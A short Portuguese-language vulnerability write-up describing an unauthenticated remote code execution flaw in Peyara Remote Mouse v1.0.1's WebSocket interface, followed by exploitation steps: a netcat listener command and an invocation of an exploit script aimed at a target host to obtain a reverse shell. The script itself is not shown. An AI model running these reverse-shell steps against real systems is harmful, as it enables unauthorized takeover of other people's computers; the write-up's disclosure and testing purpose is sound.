
Peyara Remote Mouse v1.0.1- Execução Remota de Código (RCE)
O Peyara Remote Mouse v1.0.1 contém uma vulnerabilidade de execução remota de código não autenticada em sua interface de comandos WebSocket (porta 1313). O aplicativo não valida nem sanitiza comandos simulados de entrada de teclado recebidos via conexões WebSocket, permitindo que atacantes encadeiem eventos de teclado maliciosos que executam comandos arbitrários no sistema. Essa vulnerabilidade pode ser explorada remotamente sem autenticação para obter o comprometimento total do sistema.
Instale o aplicativo vulnerável
Baixe e instale o Peyara Remote Mouse no sistema Windows de destino.
Inicie o listener do Netcat
Abra um terminal e execute:
nc -nlvp 4444
Execute o script do exploit
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

